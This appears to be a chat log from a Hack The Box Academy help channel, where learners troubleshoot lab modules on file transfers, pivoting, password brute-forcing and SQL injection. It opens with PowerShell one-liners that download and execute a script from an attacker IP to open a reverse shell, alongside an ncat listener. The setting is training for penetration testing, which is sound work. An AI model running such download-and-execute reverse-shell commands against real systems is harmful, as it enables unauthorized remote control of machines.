I am running this command ||powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://10.10.14.212:4444/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.212 -Port 4444"|| and also this one ||powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.212:4444/powercat.ps1');powercat -c 10.10.14.212 -p 4444 -e cmd" with nc - nvlp 4444 on my attacking machine. I get a connection and it says the following:||

Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.202.242.
Ncat: Connection from 10.129.202.242:61815.
GET /Invoke-PowerShellTcp.ps1 HTTP/1.1
Host: 10.10.14.212:4444
Connection: Keep-Alive

But as soon as I type something - it ends it - anyone have any advice how i can keep it in order to get a better shell for ad enumeration skill assessment 1?

check back on what's the correct syntax for ffuf, gitlab is already a vhost

If you read the notes column it's pretty self explanatory

Okay, thanks

hmm I think I got ur point

you've done shells & payload? you can't use the same port for both the listener and hosting the .ps1

https://tenor.com/view/anime-headesk-bang-headbang-dessert-gif-17584997

@next bronze - totally forgot that tbh

been bouncing between a few things and should've thought of that...thank you - totally appreciate it

I think I'm a little paranoid. I've been told many times that if I just use a vpn, avoid talking about personal details, and then use tor primarily, that my opsec is really secure, but I've always felt that even vpns are hackable because I grew up in the mindset that if it's connected to the internet it's hackable.

Vpns only mask traffic

Module: Password Attacks Section: Password Mutations

I have been trying the bruteforce task for the sam users password. I've followed the instructions using the password.list file and the custom.rule included and the best64.rule which is part of hashcat. I have cut the password files down to 1k each and modified them so they only contain passwords 8-10 characters long but nothing seems to work.

It was also suggested to use ftp as its quicker than ssh for the bf but that has not returned any positive result either.

Is anyone able to please give me a nudge on how to solve this?

Like say I was doing nation sate acting for instance, I feel like it'd be much harder than just that to prevent a government or even a bad actor from hacking ya

Do not use best64

Also just use the full list

The list you should end up with on total is 94k characters. Splitting it only adds unnecessary time

hey am new here and i need some help

i wanna go to modules to start a new one but i cant. i need to type the modules on the link (https://academy.hackthebox.com/modules) and when i go there i cant unlock any new modules and i have cubes

Disable adblock/pop-up blocker in your browser

Otherwise contact support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

thanks for responding. i dont have an ad blocker or somth like that. it says: javascript: void(0);

That's just a standard button thing

That really doesn't mean much

yea but when i press it it does nothing

it doesnt even load

Try in a different browser

Or contact support

Or both

are you opening it in a new tab

If you're using brave browser, for instance, it has built-in tools like that

am in the hack the box academy dashboard and when i press modules it doesnt work

i have tried chrome and firefox

yes are you trying to open the link in a new tab?

no

i just press modules

Do you see a green bubble in the bottom right?

nope

Then there's some form of ad block running

i will search and inform you. thanks for everything

Open in incognito mode and see if it's there

FINALLY ITS WORKING

you probably have noscript enabled, make sure you allow js to run on the website

there was and ad blocker that i disabled but i needed to remove the extension

thanks for everything everyone that responded me

Has anyone online/available completed the ADCS module by chance? May I DM? Stuck on ESC11

I have done that part, dm

@next bronze thanks

Can anyone teach me how to hack

Pls

same

You know what , i have a question where can i start learning ?

Im not sure i joined this to learn how to hack

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

No one is really gonna sit down with you and teach you one-on-one

At least not for free

Tryhackme is another decent beginner resource for learning, way more hand-holding

academy is nice

Hi, im stuck on the file transfer module, linux interactive question:" Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer." The problem it is that i cant extract the file because i cant use unzip on the ssh session. Any sugestions?

You should be able to just do the command unzip

¯_(ツ)_/¯

Would you be able to please check the commands i'm running, they are returning files > 94k chars

@covert swift As far as i know i also couldnt use unzip, dit it with pyhton

Hi Team,

Need some help regarding learning Redhat Linux guide for completing my modules.

It should just be the command from the section

gotta admit real world xss this section in XSS is golden - https://academy.hackthebox.com/module/103/section/982

Sorry we can't help you with redhat as some of it is fundamentally different than other distributions

iok i will try thanks

The command they have is hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list which is giving me a file way higher which is why I thought about splitting it down

That's giving you the expected file

You can increase threads with hydra

48 seems to be the sweet spot, no dropped requests leading to confusion

I've tried that too, still not getting any correct responses

Make sure lowercase sam

And are you attacking ftp?

You should not be attacking ssh

Yes, lowercase sam and ftp

Hey Marcielee,

Thanks for your response,🤗

I got stuck at Broken Authentication Assessment, I found the admin/support users with the country code and found that the cookie is made of the username formatted to md5 and base64 but can’t put those together. Keep getting user admin.us can’t have requested role (or something)
Any help would be much appreciated

I'm doing the Dynamic Port Forwarding with SSH and SOCKS module. My /etc/proxychains.conf is blank.

I am using kali linux on a vm. Should this have a default config already setup?

Just seems strange that it's blank.

I think on kali it's like proxychains4 or something like that

Let tab autocomplete help you there

I had to install proxychains, didn't realize it wasn't there by default, easy fix though! 👍

alright so im back at this trying to upload a zip file to a windows server

Yeah, there is a proxychains4!

i think im close

Invoke-WebRequest -Uri https://10.129.201.55:443/ -Method POST -Body $Encoded
Invoke-WebRequest: The remote certificate is invalid according to the validation procedure: RemoteCertificateNameMismatch, RemoteCertificateChainErrors

this is what i ran

Try http

Not https

should i specify a port?

If it's running on default 80, no

access forbidden

You only need to specify port for non-standard port, 80=http,443=https

my nmap scan shows 80 and 443 are forbidden

¯_(ツ)_/¯

What module is this?

windows file transfer methods

ive tried every method now

listed and none work

File transfer module and windows file transfer yeah?

Wait

for me its called windows file transfer methods

following the CPTS path

Windows file transfer methods is the section name

File Transfers is the module name

Where are you grabbing the zip from

its in the questions section

Is it from your machine, or the target

question #2

Hi MacieLee can I dm u?

That's not what I'm getting at

the download is in the questions lol

That's not what I'm talking about

So you downloaded the zip to YOUR machine yes?

yes

So why are you doing an invoke request to the target? From the target?

Should be a get request from an http server running on your system

PowerShell doesn't have a built-in function for upload operations, but we can use Invoke-WebRequest or Invoke-RestMethod to build our upload function. We'll also need a web server that accepts uploads, which is not a default option in most common webserver utilities.

thats straight from the module

You're missing the point

The target file is on yourmachine

yes i get that

So why in your command are you calling it from the windows machine to the windows machine to pull?

i see what your getting at

So you see where you're going wrong?

yeah i do

👍

i guess my understanding prior would be to get into server or upload something to a server i didnt have access too

but i guess this isnt that

@elder jackal @zealous oyster I didn't give permission to dm

You first need to upload the file to the target system

And to pull the file from your system it needs your tun0 ip

On the last part of the SSH and SOCKS tunneling module I'm getting an error when trying to RDP

well it says there your proxy is timing out

so you didnt set it up right

I figured it out. I had closed the ssh session that I was connected to. I'm assuming that was the issue. It worked when I reopened the ssh session.

Am I supposed to keep every SSH session open in this module, or just the latest one I'm working on?

yeah that'll do it

There are only three, so I guess it doesn't matter.

the ssh connection is what your proxychains is going on

Apologies

-D 9050 tells the ssh connection to treat your connection as a dynamic port forward

For some reason in my head I thought it was locked in on my end once I did the proxychain, but it makes sense now

theres a cmd flag to not start an interactive session

I like that so I dont forget that instance is my tunnel

is there anything I can do with captured netNTLMv2 hashes that can't be cracked

hi

@fathom pendant thank you so much for your help earlier, i was able to upload!

You can relay them

lol The Gaara refrence is 100% accurate

how it gums to 5 chew feel

What I hope is a quick question regarding academy modules in general... I'm currently in the Info Gathering - Web Edition and when looking at the cheat sheet is seems like overload when looking at it, is there a certain way to grasp the information without writing the cheat sheet down for a reference to look at ?

i found a new problem with file transfers module but i believe its actual content issue. i was able to upload the "upload_win.zip" to the windows server. the next step is to extract it and then run hasher upload_win.txt however the result i get and plug into the HTB answer field says its wrong

strange, also there was already a file called upload_win.txt on the desktop and i ran hasher on that.. that result is also wrong

i wonder if they knew this was an issue and tried to correct it that way

repetition is key but I would say just copy paste and when you need it just get the command

after few labs your brain will know what to do

the cheat shit is basically the commands from the module without context of their explanation

usually you're introduced to the command with context of what they do

yeah for sure, I'm just trying to look for a way, to understand the tools mentioned and "basic syntax" if you could call it that without writing 10 pages of commands etc

man <command> and look for the flags that the cheatsheet is using with the command

that way you can summarize what it does

any module out there that contains Metasploit topics?
cant see that any dedicated module to this topic exist out there

https://academy.hackthebox.com/module/details/39 you mean like this?

guys

my vm is spamming the sound i get when i hit backspace on an empty terminal

and i cant click or anything

iirc it's a setting you can turn off

yeah like this but more advanced, i have already finished this one :/

i don't think there's really any advanced ones

i know the pivoting and portfwarding module touches on using msfvenom and metasploit as a pivot/proxy

want one with setting a persistent shell and migrating into processes

ok thx

ima do this

if this is for a machine like on the main platform then yes; wrong place

if it's related to an academy module then more context is needed

#boxes is for the main platform boxes and you can ask for a nudge there

TY

Anyone having network connection issues? Trying to connect to the box in the AD Enumeration & Attacks module (Skills Assessment II), and can seem to even ssh. Ping show packet loss...

Now I am getting ssh: connect to host 10.129.210.201 port 22: Connection timed out

Tried resetting the target?

Yes, I have done it 2 times already. And I was having issues with this last night too

Hmm, maybe try regenerating your VPN, use TCP if you already haven't been using that.

I was doing this from the HTB pwnbox.

I thought it was the vpn on my local VM but same happens with the HTB pwnbox

You're not having both running at the same time right?

make sure you aren't accidentally running both at the same time

Ohhh I had my vpn still on in my VM. Just turned it off. Let me try on the HTB box again.

Make sure you're connecting to one VPN connection, Academy VPN doesn't handle switching between pwnBox VPN and normal VPN that well.

(at all)

it's a network collision issue

Well, same issue. No connection to the target box. If i am using the HTB academy pwnbox, I don't activate a vpn connection. I just boot up the vm in my browser and start working there.

Let me try the TCP vpn file

Using TCP vpn, restarted my personal VM. Things are working, somewhat laggy though.

Why am I getting this error?

I'm doing the "Configuring MSF's SOCKS Proxy" section in the "Meterpreter Tunneling and Port Forwarding" module

youre using it from a meterpreter shell

Anyone familiar with Oracle TNS enumeration page of the Footprinting module? I'm trying to do the tools setup so that I can run sqlplus, but when I run the command to install it I'm getting an error that is saying it is not found

I'm having trouble with footprinting module as well. I need a hint to find full system path of the specific sambashare. Last question of SMB section.

on the file transfer module.. windows file transfer methods, i was able to upload the zip to the windows machine. and when i use hasher against it, what it gives me back, the answer is wrong (question 2)

Use all the tools mentioned

Note: if you did find the path, it looks odd doesn't it?

The hash starts with f

Make sure no weird extra spaces or characters

Module "Pivoting, Tunneling and Port Forwarding"
Section "Dynamic Port Forwarding with SSH and SOCKS Tunneling"

my proxychains is set up to use socks4 on localhost and port 9050

i connect to the victim with the provided credentials and using dynamic port 9050

now everything i try the victim refuses everything i do, what may be the cause?

Once you set up the initial proxy you go to the second host. You don't need proxy chains for the 10.129 host, as you've always been able to access it

Yeah, I try to follow along as I go instead of reading and then doing the questions, so the ordering got hazy on this one. I redid it and backgrounded the session before proceeding. Worked fine after that.

It tells you to background it tbf

oh dang i havent read the question careful enough, didnt notice it says, that i have to scan an internal target like 172.xxx.... xD

yeah makes sense

Iirc this one might be a 3 step process

But I could be wrong

A -> B -> C

The pivot module is very much a follow along

yeah a-b-c seems right

As in there's a user/system between the initial foothold and final target

My eyes mostly glazed over it

Does anyone know an additional fix for the sqlplus error besides the one mentioned in the Oracle TNS lab?

Neither the original set up code or the fix works to download the command works

Not that I know of

Sqlplus is a pita

yes i got the flag 🙂 thx

@fathom pendant any thoughts on how I can get into SQL server without it? After trying the fix command I still get the "command not found" error when typing in the command

im starting to think theres something wrong with the zip file. I tried a different upload method using encoding/ decoding and get the same issue

C:

Unfortunately I don't believe so as the enumeration is based off sqlplus

<@&861185840277487616>

Don't give the public ip of your friend, even as a joke

While there's mostly good people out there - there's always the one asshole who will ddos

That's also assuming you're not just a fed bait

good

@fathom pendant will reach out to support, was able to get that MSSQL issue figured out unintentionally with their help

not spanish

not inglish

no leer reglas

por no entender

#welcome and #rules

pero no se ingles

English only in the server

No es mi problema, solo Ingles Aqui.

@weak kindle Ive been stuck on question #3 all day. I know it's something stupid and simple I'm missing, can you help guide me or point me in the right direction?

hello there
i'm stuck on the last section of SQLi fundamentals: skills assessment
i've tried all i know against the login form, found another page that's redirecting me with 302 code but no hint about any SQLi
i even ran SQLmap which tells me that none of the fields are injectable...
Any ideas ?

302 = redirect where is it sending you

If you were like me and simply copying and pasting commands from a previous page, then you might want to make sure that you're writing to the right pages/files.

/dashboard/index.php with size 0

no content

ah

"writing to files" ?

not even sure that page exists - ||thats not where you should be redirected to||

not inventing it xD

I'm not actually a hacker, I just come here to feel cool